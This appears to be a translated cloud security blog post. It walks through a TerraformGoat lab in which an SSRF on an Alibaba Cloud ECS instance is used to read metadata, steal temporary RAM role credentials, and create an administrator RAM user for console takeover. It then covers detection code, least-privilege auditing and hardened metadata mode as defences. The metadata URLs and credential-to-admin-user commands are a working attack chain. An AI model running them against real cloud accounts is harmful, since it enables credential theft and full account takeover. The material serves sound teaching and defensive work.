
Title: From a Cloud Server SSRF Vulnerability to Taking Over Your Alibaba Cloud Console


0x00 Introduction

This article uses Alibaba Cloud as an example to demonstrate some offensive and defensive techniques for cloud services. First, Terraform is used to build an ECS environment containing an SSRF vulnerability; then, step by step, that SSRF vulnerability in the instance is used to obtain all Alibaba Cloud service permissions of the cloud account.

0x01 Environment Setup

This article uses TerraformGoat to build the lab environment. TerraformGoat repository: https://github.com/HuoCorp/TerraformGoat

Deploying the lab requires your Alibaba Cloud AccessKey. To avoid affecting your production cloud environment, it is strongly recommended to use an AccessKey from a non-production account here and never the same account as production.

Because TerraformGoat has been updated since this was written, the setup steps below no longer work; the current deployment method is simpler and friendlier. For the up-to-date procedure, refer to the TerraformGoat repository linked above.

Next we build the lab. First clone the project locally, then build the container image that carries the lab's dependencies.

git clone https://github.com/HuoCorp/TerraformGoat.git --depth 1

cd TerraformGoat

docker build . -t terraformgoat:v0.0.3

docker run -itd --name terraformgoat terraformgoat:v0.0.3

docker exec -it terraformgoat /bin/bash

If GitHub access is slow, you can set a proxy in the terminal:

proxy_url='127.0.0.1:1080'

export https_proxy=http://$proxy_url http_proxy=http://$proxy_url all_proxy=socks5://$proxy_url

After entering the container, it prompts you to select the cloud provider to use next. Taking Alibaba Cloud as the example here, enter 2 to select Alibaba Cloud and press Enter.


Enter the Alibaba Cloud ECS SSRF lab directory and configure your AccessKey:

cd /TerraformGoat/aliyun/ecs/ecs_ssrf/

aliyun configure

Deploy the SSRF lab:

terraform init

terraform apply

If terraform init is slow, set the proxy as described above.

During apply you will be prompted with "Enter a value"; type yes and press Enter.


Under Outputs you can see the returned lab address. Visiting that address shows the SSRF test page, which means the environment is ready.


0x02 Exploiting the Environment

The current environment contains an SSRF vulnerability, but unlike an ordinary SSRF, this one lives on a cloud server, which means we can use it to reach the server's instance metadata service.

Access the metadata:

http://100.100.100.200/latest/meta-data

In the returned result you can see that the current environment has a ram/ directory, which means a RAM role is bound to this cloud server, so we can obtain temporary credentials.

Obtain temporary credentials through the metadata service:

The huocorp-terraform-goat-role in the URL is the RAM role name; it can be obtained by visiting http://100.100.100.200/latest/meta-data/ram/security-credentials/.

http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role

Configure the temporary credentials in the aliyun command-line tool:

aliyun configure --mode StsToken

Create a sub-user and grant it administrator permissions:

aliyun ram CreateUser --UserName teamssix

aliyun ram CreateLoginProfile --UserName teamssix --Password TeamsSix@666

aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix

Visit https://signin.aliyun.com and log in as a RAM user. The user format is username@company-alias, where username is the user just created; company-alias can be obtained with the following command:

aliyun ram GetAccountAlias

The AccountAlias here is the company-alias we need, and you can log in to the console next.


Enter the password set when the user was created.


After logging in, you can see the target console.


Because AdministratorAccess was attached when the user was created, the RAM console shows that the current account has permission to manage all Alibaba Cloud resources.


In the ECS instance list you can also see the SSRF lab server we just built.


At this point, the Alibaba Cloud console has been taken over by exploiting the SSRF vulnerability on the cloud server.

In addition, a flag file is placed in this environment; if you are interested, try to find it. Writeup: https://github.com/HuoCorp/TerraformGoat/tree/main/aliyun/ecs/ecs_ssrf
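From the defender's side, the chain above (CreateUser, CreateLoginProfile, AttachPolicyToUser with AdministratorAccess, all issued by an instance role's STS session within minutes) is a clear detection opportunity. The following Python is an added example, not code from the original post or from TerraformGoat; the ActionTrail-style event layout and the sample events are constructed assumptions, so map the field names onto your real export.

```python
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample of ActionTrail-style RAM events. The field layout
# (eventName, userIdentity.type/userName, requestParameters) is an assumption.
ROLE = "huocorp-terraform-goat-role:i-ecs-session"
SAMPLE_EVENTS = json.dumps([
    {"eventTime": "2023-01-31T14:51:00Z", "eventName": "CreateUser",
     "userIdentity": {"type": "assumed-role", "userName": ROLE},
     "requestParameters": {"UserName": "teamssix"}},
    {"eventTime": "2023-01-31T14:51:20Z", "eventName": "CreateLoginProfile",
     "userIdentity": {"type": "assumed-role", "userName": ROLE},
     "requestParameters": {"UserName": "teamssix"}},
    {"eventTime": "2023-01-31T14:51:45Z", "eventName": "AttachPolicyToUser",
     "userIdentity": {"type": "assumed-role", "userName": ROLE},
     "requestParameters": {"UserName": "teamssix", "PolicyName": "AdministratorAccess"}},
    # Benign: a human admin creates a read-only user; must not be flagged.
    {"eventTime": "2023-01-31T15:10:00Z", "eventName": "CreateUser",
     "userIdentity": {"type": "ram-user", "userName": "ops-admin"},
     "requestParameters": {"UserName": "auditor"}},
    {"eventTime": "2023-01-31T15:10:30Z", "eventName": "AttachPolicyToUser",
     "userIdentity": {"type": "ram-user", "userName": "ops-admin"},
     "requestParameters": {"UserName": "auditor", "PolicyName": "ReadOnlyAccess"}},
])
HIGH_PRIV = {"AdministratorAccess"}
CHAIN = {"CreateUser", "CreateLoginProfile", "AttachPolicyToUser"}

def detect_ram_persistence(raw_json, window_minutes=60):
    """One finding per (actor, new user) that completed CreateUser ->
    CreateLoginProfile -> AttachPolicyToUser(high-privilege) inside the
    window; an assumed role doing it (the instance-role case) rates high."""
    steps, actor_type = defaultdict(dict), {}
    for e in json.loads(raw_json):
        name, params = e["eventName"], e.get("requestParameters", {})
        if name not in CHAIN or (name == "AttachPolicyToUser"
                                 and params.get("PolicyName") not in HIGH_PRIV):
            continue  # unrelated call, or a low-privilege policy attachment
        actor = e["userIdentity"]["userName"]
        actor_type[actor] = e["userIdentity"]["type"]
        when = datetime.fromisoformat(e["eventTime"].replace("Z", "+00:00"))
        steps[(actor, params.get("UserName"))][name] = when
    findings = []
    for (actor, target), seen in steps.items():
        span = (max(seen.values()) - min(seen.values())).total_seconds()
        if set(seen) == CHAIN and span <= window_minutes * 60:
            findings.append({"actor": actor, "target_user": target, "seconds": int(span),
                "severity": "high" if actor_type[actor] == "assumed-role" else "medium"})
    return findings
```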

0x03 Defense Measures

Besides the SSRF itself, this environment has two other major problems.

First, the RAM role's permissions are far too broad, so the role's credentials can be used for RAM operations such as creating sub-users and granting them high privileges.

Second, metadata access is not hardened, so once the target has an SSRF, or the instance itself is compromised, the metadata is at risk of being read.

For the first problem, the over-privileged RAM role, the main remedy is to strictly follow the principle of least privilege: when granting permissions to a RAM role, avoid overly broad grants and give only the permissions actually needed. This minimizes the impact but does not address the root cause.
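One way to make the least-privilege check concrete is to audit a role's policy document for the RAM actions the takeover above depends on. This Python is an added example, not code from the original post or from TerraformGoat; the two policy documents are constructed samples, the list of escalation actions is my own selection, and resource scoping is deliberately ignored as a simplification.

```python
import json
from fnmatch import fnmatchcase

# RAM actions that let a compromised instance role mint its own console user,
# as in the post above. The selection is ours; the action names are RAM's.
ESCALATION_ACTIONS = ("ram:CreateUser", "ram:CreateLoginProfile",
                      "ram:AttachPolicyToUser", "ram:AttachPolicyToRole")

# Constructed samples: an over-broad role policy next to a scoped one.
OVERBROAD_POLICY = json.dumps({"Version": "1", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}]})
SCOPED_POLICY = json.dumps({"Version": "1", "Statement": [
    {"Effect": "Allow", "Action": ["oss:GetObject", "oss:ListObjects"],
     "Resource": "acs:oss:*:*:app-bucket/*"},
    # Broad ram:* grant, partly clawed back by an explicit Deny.
    {"Effect": "Allow", "Action": "ram:*", "Resource": "*"},
    {"Effect": "Deny", "Action": ["ram:CreateUser", "ram:AttachPolicyToUser"],
     "Resource": "*"}]})

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _matches(action, patterns):
    # RAM action patterns use '*' wildcards; names are matched
    # case-insensitively.
    return any(fnmatchcase(action.lower(), p.lower()) for p in patterns)

def escalation_actions(policy_json):
    """Return the escalation actions a policy effectively allows. An explicit
    Deny beats an Allow (as in RAM evaluation); Resource scoping is ignored
    here as a simplification."""
    allowed, denied = [], []
    for stmt in json.loads(policy_json)["Statement"]:
        bucket = allowed if stmt["Effect"] == "Allow" else denied
        bucket.extend(_as_list(stmt["Action"]))
    return [a for a in ESCALATION_ACTIONS
            if _matches(a, allowed) and not _matches(a, denied)]

def is_least_privilege(policy_json):
    """True when the policy grants none of the escalation actions."""
    return not escalation_actions(policy_json)
```

Run it against the policies attached to every role that is bound to an ECS instance; any non-empty result is a role that would let this post's SSRF-to-console chain succeed.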

For the second problem, unhardened metadata access, the instance's metadata access mode can be set to hardened mode. This is the fundamental fix. There are two ways to set it:

When creating an instance, set "Instance Metadata Access Mode" to hardened-only mode under Advanced Options in System Configuration.

For an instance that already exists, you can enforce token-based metadata access through the Alibaba Cloud OpenAPI. OpenAPI address: https://next.api.aliyun.com/api/Ecs/2014-05-26/ModifyInstanceMetadataOptions

Setting HttpTokens to required enforces hardened mode; after that, plain requests to the metadata service are answered with 403.


It is worth noting that hardened mode prevents metadata from being obtained through SSRF, but if the instance itself is compromised, the red team can still run a command on the instance to obtain a token and then use that token to read the metadata.

The command to obtain a token on a Linux instance is as follows:

TOKEN=$(curl -X PUT 'http://100.100.100.200/latest/api/token' -H 'X-aliyun-ecs-metadata-token-ttl-seconds: 21600')

Read the metadata with the token (the header must be double-quoted so that $TOKEN is expanded by the shell):

curl -H "X-aliyun-ecs-metadata-token: $TOKEN" http://100.100.100.200/latest/meta-data/

For the procedure on Windows instances, refer to Alibaba Cloud's official documentation: https://help.aliyun.com/document_detail/108460.htm

This method of setting the metadata access mode to hardened mode to defend against SSRF was provided by 2h0ng.

0x04 Environment Cleanup

Delete the created sub-user:

aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix

aliyun ram DeleteUser --UserName teamssix

Delete the SSRF lab environment. Remember to delete it promptly after use, because the cloud resources created here are billed by time; this lab instance costs RMB 0.17 per hour.

Before destroying the lab, remember to switch the configured credentials back to your original AccessKey with: aliyun configure --mode AK

terraform destroy

If you want to remove TerraformGoat entirely, use the following commands. If you plan to keep learning cloud attack and defense, you can keep the TerraformGoat environment.

docker stop terraformgoat

docker rm terraformgoat

docker rmi terraformgoat:v0.0.3

0x05 Summary

In this article, a temporary key was obtained through the SSRF vulnerability on the cloud server, a sub-user with administrator access was created with that temporary key, and finally the target console was taken over through that sub-user.

However, using this method in real engagements has some prerequisites, mainly the following two:

The ECS instance must have a RAM role bound to it; otherwise the metadata path for temporary credentials returns 404.

The RAM role must have the relevant RAM permissions, such as creating users and granting permissions; otherwise the temporary key does not have permission to create sub-users.

In practice, even when an ECS instance has a RAM role, the role usually does not have user-creation permission. In that case it is impossible to log in to the console by creating a sub-account, and the target's cloud services can only be operated through the Alibaba Cloud command-line tool.

In general, cloud attack and defense still differs greatly from conventional intranet attack and defense.

A common problem in cloud attack and defense is misconfiguration; the problem here, for example, is that the RAM role's permissions are too high.

The main way to maintain access in the cloud is to create high-privilege RAM users, rather than the wide variety of persistence methods used in traditional attack and defense.

Lateral movement in the cloud mainly happens through the cloud provider's command-line tool or console, from one cloud service to another, rather than through the many intranet lateral-movement methods of traditional attack and defense.

Finally, many of the commands in this article come from the Fireline Cloud Security Knowledge Base: https://cloudsec.huoxian.cn. The Fireline Cloud Service Attack and Defense Matrix can be found on the knowledge base homepage, and this article follows that matrix.


If you want more cloud security resources to learn from, visit the Awesome Cloud Security project, which currently collects more than a hundred domestic and foreign cloud security blogs, tools, official accounts and other resources: https://github.com/teamssix/awesome-cloud-security


Reference article: https://cloudsec.huoxian.cn/docs/articles/aliyun/aliyun_ecs

Original link: https://wiki.teamssix.com/CloudService/EC2/aliyun-console-takeover.html
